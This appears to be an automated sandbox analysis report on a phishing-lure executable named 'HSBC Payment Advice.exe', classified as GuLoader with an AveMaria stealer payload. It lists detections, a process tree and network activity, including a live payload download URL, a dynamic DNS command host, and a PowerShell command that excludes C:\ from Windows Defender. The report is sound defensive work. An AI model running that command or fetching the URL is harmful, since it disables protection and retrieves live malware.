
Windows Analysis Report HSBC Payment Advice.exe

Overview

General Information

Sample Name: HSBC Payment Advice.exe
Analysis ID: 528768
MD5: a069e61b357f625a7b3595150412c42d
SHA1: 5fa560d04b13db7e0216bda2ca5f1c3b94a8912e
SHA256: 0fb47a47bc025991b3ed8895aa84030def6e5cc538a9cec279a73f4528d549c6
Tags: exe, HSBC, signed

Most interesting Screenshot:

Detection

GuLoader, AveMaria, UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Potential malicious icon found
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Increases the number of concurrent connection per server for Internet Explorer
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • HSBC Payment Advice.exe (PID: 6196 cmdline: "C:\Users\user\Desktop\HSBC Payment Advice.exe" MD5: A069E61B357F625A7B3595150412C42D)
    • HSBC Payment Advice.exe (PID: 5816 cmdline: "C:\Users\user\Desktop\HSBC Payment Advice.exe" MD5: A069E61B357F625A7B3595150412C42D)
      • powershell.exe (PID: 7140 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • images.exe (PID: 6136 cmdline: C:\ProgramData\images.exe MD5: A069E61B357F625A7B3595150412C42D)
        • images.exe (PID: 5216 cmdline: C:\ProgramData\images.exe MD5: A069E61B357F625A7B3595150412C42D)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://spuredge.com/warzone_JBBOxCEy72.bin"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x1cc30:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x1cc30:$c1: Elevation:Administrator!new:
0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xd80:$c1: Elevation:Administrator!new:
12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}

Sigma Overview

System Summary:

Sigma detected: Powershell Defender Exclusion
Source: Process started | Author: Florian Roth | Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC Payment Advice.exe", ParentImage: C:\Users\user\Desktop\HSBC Payment Advice.exe, ParentProcessId: 5816, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7140
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC Payment Advice.exe", ParentImage: C:\Users\user\Desktop\HSBC Payment Advice.exe, ParentProcessId: 5816, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7140
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132823686502527122.7140.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://spuredge.com/warzone_JBBOxCEy72.bin"}
Multi AV Scanner detection for submitted file
Source: HSBC Payment Advice.exe | Virustotal: Detection: 56%
Source: HSBC Payment Advice.exe | Metadefender: Detection: 20%
Source: HSBC Payment Advice.exe | ReversingLabs: Detection: 48%
Yara detected AveMaria stealer
Source: Yara match | File source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for domain / URL
Source: spuredge.com | Virustotal: Detection: 11%
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\images.exe | Virustotal: Detection: 56%
Source: C:\ProgramData\images.exe | Metadefender: Detection: 20%
Source: C:\ProgramData\images.exe | ReversingLabs: Detection: 48%
Machine Learning detection for sample
Source: HSBC Payment Advice.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\ProgramData\images.exe | Joe Sandbox ML: detected
Source: 12.0.HSBC Payment Advice.exe.400000.1.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 12.0.HSBC Payment Advice.exe.400000.3.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 28.0.images.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 12.0.HSBC Payment Advice.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 28.0.images.exe.400000.1.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.HSBC Payment Advice.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 21.2.images.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 21.0.images.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 0.2.HSBC Payment Advice.exe.400000.0.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 12.0.HSBC Payment Advice.exe.400000.2.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 28.0.images.exe.400000.2.unpack | Avira: Label: TR/Dropper.VB.Gen
Source: 28.0.images.exe.400000.3.unpack | Avira: Label: TR/Dropper.VB.Gen

Exploits:

Yara detected UACMe UAC Bypass tool
Source: Yara match | File source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
Source: HSBC Payment Advice.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown | HTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49784 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49823 version: TLS 1.2
Source: C:\Users\user\Desktop\HSBC Payment Advice.exe | Directory created: C:\Program Files\Microsoft DN1

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: https://spuredge.com/warzone_JBBOxCEy72.bin
Uses dynamic DNS services
Source: unknown | DNS query: name: barr2.ddns.net
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: spuredge.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: spuredge.com | Cache-Control: no-cache
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49823
Source: HSBC Payment Advice.exe, images.exe.12.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: HSBC Payment Advice.exe, images.exe.12.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: HSBC Payment Advice.exe, 0000000C.00000003.502726009.0000000001B35000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501873155.0000000001B34000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.498183760.0000000001B36000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.509729103.0000000001B35000.00000004.00000020.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.498385567.0000000001B36000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: HSBC Payment Advice.exe, images.exe.12.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: HSBC Payment Advice.exe, images.exe.12.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: HSBC Payment Advice.exe, images.exe.12.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: HSBC Payment Advice.exe, images.exe.12.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: HSBC Payment Advice.exe, images.exe.12.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: HSBC Payment Advice.exe, images.exe.12.dr | String found in binary or memory: http://ocsp.digicert.com0O
Source: HSBC Payment Advice.exe, images.exe.12.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmp | String found in binary or memory: https://spuredge.com/warzone_JBBOxCEy72.bin
Source: HSBC Payment Advice.exe, images.exe.12.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown | DNS traffic detected: queries for: spuredge.com
Source: global traffic | HTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: spuredge.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /warzone_JBBOxCEy72.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: spuredge.com | Cache-Control: no-cache
Source: unknown | HTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49784 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 38.103.244.107:443 -> 192.168.2.7:49823 version: TLS 1.2
Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp | Binary or memory string: GetRawInputData

E-Banking Fraud:

Yara detected AveMaria stealer
Source: Yara match | File source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY

              System Summary:

              barindex
              Potential malicious icon foundShow sources
              Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
              Malicious sample detected (through community Yara rule)Show sources
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
              Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: HSBC Payment Advice.exe
              Executable has a suspicious name (potential lure to open the executable)Show sources
              Source: HSBC Payment Advice.exeStatic file information: Suspicious name
              Source: HSBC Payment Advice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b9deb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b316a8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 12.3.HSBC Payment Advice.exe.1b30110.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004011A8
              Source: C:\ProgramData\images.exeCode function: 28_2_017A95F9
              Source: C:\ProgramData\images.exeCode function: 28_2_017A922A
              Source: C:\ProgramData\images.exeCode function: 28_2_017A1819
              Source: C:\ProgramData\images.exeCode function: 28_2_017AF0C8
              Source: C:\ProgramData\images.exeCode function: 28_2_017A037F
              Source: C:\ProgramData\images.exeCode function: 28_2_017A5758
              Source: C:\ProgramData\images.exeCode function: 28_2_017AC713
              Source: C:\ProgramData\images.exeCode function: 28_2_017A4415
              Source: C:\ProgramData\images.exeCode function: 28_2_017A9AD4
              Source: C:\ProgramData\images.exeCode function: 28_2_017A76CA
              Source: C:\ProgramData\images.exeCode function: 28_2_017ADCC3
              Source: C:\ProgramData\images.exeCode function: 28_2_017A9483
              Source: C:\ProgramData\images.exeCode function: 28_2_017A95F9 NtAllocateVirtualMemory,
              Source: C:\ProgramData\images.exeCode function: 28_2_017AEB88 NtProtectVirtualMemory,
              Source: C:\ProgramData\images.exeProcess Stats: CPU usage > 98%
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess Stats: CPU usage > 98%
              Source: HSBC Payment Advice.exe, 00000000.00000000.245504475.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
               Source: HSBC Payment Advice.exe, 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
               Source: HSBC Payment Advice.exe, 0000000C.00000000.376134620.000000000041B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
               Source: HSBC Payment Advice.exe, 0000000C.00000002.517452791.000000001F0E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
               Source: HSBC Payment Advice.exe	Binary or memory string: OriginalFilenameForm_HALVGUDB.exe vs HSBC Payment Advice.exe
               Source: HSBC Payment Advice.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
               Source: images.exe.12.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
               Source: HSBC Payment Advice.exe	Static PE information: invalid certificate
               Source: HSBC Payment Advice.exe	Virustotal: Detection: 56%
               Source: HSBC Payment Advice.exe	Metadefender: Detection: 20%
               Source: HSBC Payment Advice.exe	ReversingLabs: Detection: 48%
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	File read: C:\Users\user\Desktop\HSBC Payment Advice.exe
               Source: HSBC Payment Advice.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
               Source: C:\Users\user\Desktop\HSBC Payment Advice.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
               Source: C:\ProgramData\images.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
               Source: unknown	Process created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
